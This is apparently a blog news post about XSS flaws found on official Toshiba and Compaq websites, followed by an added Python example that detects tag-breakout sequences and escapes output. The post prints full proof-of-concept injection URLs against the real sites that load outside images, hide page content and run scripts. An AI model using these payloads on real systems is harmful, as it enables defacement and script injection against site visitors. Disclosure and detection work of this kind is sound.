
Toshiba & Compaq official sites vulnerable to XSS (Cross-Site Scripting)

A hacker known as "Sony" discovered XSS vulnerabilities in the official Toshiba and Compaq websites. Yesterday, he discovered XSS vulnerabilities in the Stanford and Oxford university websites.

POC for Compaq vulnerability:
https://neptest.nonstop.compaq.com/buildpage.asp?Page=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/ori/sneg/snow29.gif%22%3E%3Cscript%3Ealert%28%22Without%20music,%20life%20would%20be%20a%20mistake..%20By%20Sony%22%29%3C/script%3E%3Cimg%20src=http://media.bigoo.ws/content/christmas/gif_bells/bells_35.gif%20align=center%3E%3Ciframe%20width=%22520%22%20height=%22415%22%20src=%22http://www.youtube.com/embed/BoAKPrzrKPI%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Cimg%20src=http://media.bigoo.ws/content/christmas/gif_bells/bells_35.gif%20align=center%3E%3Cimg%20src=http://foxtrotters.tripod.com/ansnowmn2.gif%20align=center%3E


POC for Toshiba vulnerability:
http://start.toshiba.com/games/free_online_games.php?cat=%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%20%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow%20by%20Sony%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html{background-image:%20url%28http://www.lenagold.ru/fon/peo/part/body09.jpg%29;}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3Cimg%20src=%22http://i1.giftube.ru/multjashki/kot_vygljadyvaet_927ccf5f2ff24217ac6dd26dceed075a.gif%22%20style=%22height:%20400px;%20width:%20500px;%22%3E
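
The Toshiba PoC above begins with `"></title><script>`, which closes the HTML context the `cat` value is reflected into before opening a script tag. The following Python is an added example, not code from the original post or from either site: it decodes a query string once, flags parameter values that carry such breakout sequences, and shows the value rendered inert by output encoding. The `render_title` template, the shortened sample URL and the benign `puzzle` value are assumptions made for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed samples: a shortened form of the Toshiba PoC above (same "cat"
# parameter, same leading breakout), and a benign request for comparison.
SAMPLE_URLS = [
    "http://start.toshiba.com/games/free_online_games.php"
    "?cat=%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%20%22%29%3C/script%3E",
    "http://start.toshiba.com/games/free_online_games.php?cat=puzzle",
]

# Sequences showing that a value tries to leave the context it is reflected in.
BREAKOUTS = {
    "attribute-close": re.compile(r"""["']\s*>"""),
    "title-close": re.compile(r"</\s*title\s*>", re.I),
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "style-tag": re.compile(r"<\s*style\b", re.I),
    "iframe-tag": re.compile(r"<\s*iframe\b", re.I),
}


def inspect_url(url):
    """Return {parameter: [breakout names]} for query values carrying markup."""
    findings = {}
    # parse_qsl percent-decodes each value once, like the receiving server.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits = [label for label, rx in BREAKOUTS.items() if rx.search(value)]
        if hits:
            findings[name] = hits
    return findings


def first_param(url, name):
    """Decoded value of one query parameter."""
    return dict(parse_qsl(urlsplit(url).query))[name]


def render_title(cat):
    """Hypothetical template: reflect the value HTML-escaped, quotes included."""
    return "<title>Games: {}</title>".format(html.escape(cat, quote=True))


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(inspect_url(url) or "clean", "|", render_title(first_param(url, "cat")))
```
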

source:
st2tea.blogspot.com